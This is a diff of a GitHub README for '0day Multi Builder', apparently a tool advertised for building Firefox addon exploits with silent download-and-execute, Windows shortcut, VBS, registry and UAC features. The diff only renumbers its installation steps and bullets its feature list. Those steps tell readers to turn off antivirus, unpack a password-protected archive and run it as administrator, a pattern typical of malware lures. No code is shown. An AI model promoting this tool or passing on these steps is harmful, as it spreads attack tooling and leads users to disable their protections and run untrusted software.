cloudx0r/0day-Multi-Builder/README.md

 # 0day-Multi-Builder

 0day Multi Builder  is a straightforward exploit builder for Firefox addons that allows for silent download, execution, and use of Windows shortcuts.

 ![photo_2023-11-12_20-33-27](https://github.com/cloudx0r/0day-Multi-Builder/assets/107898938/2fcd7fa7-aa81-43e1-bff0-62ee6753fe30)

 Installation

-    Turn Off Antivirus
+    1. Turn Off Antivirus
-    Extract files rar password: 0day
+    2. Extract files rar password: 0day
-    Right Click Run as Administrator
+    3. Right Click Run as Administrator
-    Go to realeases and download the )day Multi Builder You're are good to go!
+    4. Go to realeases and download the 0day Multi Builder
+    5. You're are good to go!

 Features

-    Download and Execute Exploit
+    * Download and Execute Exploit

-    Windows Shortcut EXploit
+    * Windows Shortcut EXploit

-    Using Vbs script
+    * Using Vbs script

-    Using Reg
+    * Using Reg

-    UAC Enable
+    * UAC Enable

-    Using Reg File
+    * Using Reg File

 Download and Execute Exploit